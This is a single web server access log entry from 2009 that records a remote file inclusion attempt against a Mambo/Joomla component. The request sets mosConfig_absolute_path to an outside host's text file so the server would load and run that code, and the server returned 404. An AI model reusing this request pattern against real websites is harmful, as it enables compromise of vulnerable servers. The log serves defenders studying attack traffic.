72.11.145.8 - - [17/Oct/2009:04:02:52 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
